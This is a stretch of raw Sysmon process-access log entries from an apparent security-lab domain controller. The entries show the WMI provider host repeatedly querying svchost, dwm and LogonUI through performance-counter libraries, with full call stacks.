13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 